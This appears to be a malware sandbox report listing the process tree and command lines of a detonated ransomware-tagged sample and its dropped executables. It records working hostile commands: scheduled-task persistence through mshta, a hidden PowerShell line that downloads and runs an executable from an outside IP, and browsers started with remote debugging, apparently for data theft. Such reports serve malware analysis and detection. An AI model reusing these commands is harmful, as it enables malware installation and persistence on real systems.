PID 1404 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1404 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1404 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2848 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe
PID 2848 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe
PID 2848 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe
PID 448 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe C:\Windows\SysWOW64\cmd.exe
PID 448 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe C:\Windows\SysWOW64\cmd.exe
PID 448 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe C:\Windows\SysWOW64\cmd.exe
PID 448 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe C:\Windows\SysWOW64\mshta.exe
PID 448 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe C:\Windows\SysWOW64\mshta.exe
PID 448 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe C:\Windows\SysWOW64\mshta.exe
PID 1908 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1908 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1908 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3612 wrote to memory of 3096 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3612 wrote to memory of 3096 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3612 wrote to memory of 3096 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 624 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe
PID 624 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe
PID 624 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe
PID 3096 wrote to memory of 4908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE
PID 3096 wrote to memory of 4908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE
PID 3096 wrote to memory of 4908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE
PID 2848 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2208 wrote to memory of 3176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2208 wrote to memory of 3176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2208 wrote to memory of 3176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3176 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3176 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3176 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3176 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3176 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3176 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 4920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 4920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 4920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3176 wrote to memory of 4184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3176 wrote to memory of 4184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4184 wrote to memory of 3712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4184 wrote to memory of 3712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4184 wrote to memory of 3712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe

"C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe

C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe

"C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe

"C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 1DLw5mafSOb /tr "mshta C:\Users\Admin\AppData\Local\Temp\ezjRGBi5N.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\ezjRGBi5N.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 1DLw5mafSOb /tr "mshta C:\Users\Admin\AppData\Local\Temp\ezjRGBi5N.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe"

C:\Users\Admin\AppData\Local\Temp0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE

"C:\Users\Admin\AppData\Local\Temp0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10038770121\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10038770121\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\ProgramData\cxqswdu\bsnjgb.exe

C:\ProgramData\cxqswdu\bsnjgb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "vfYNomahyEJ" /tr "mshta \"C:\Temp\YiLDlq6mz.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\YiLDlq6mz.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe

C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe

"C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff97347cc40,0x7ff97347cc4c,0x7ff97347cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1792,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1788 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2160,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2408 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2192,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2620 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3376,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4600,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4628 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4612,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4808 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4564,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4748 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4648,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4588 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4480,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4960 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5028,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5040 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4900 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5148,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5036 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5056,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5180 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5184,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5332 /prefetch:2

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9734846f8,0x7ff973484708,0x7ff973484718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2544 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2704 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2588 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3272 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3328 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3324 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3856 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3840 /prefetch:2
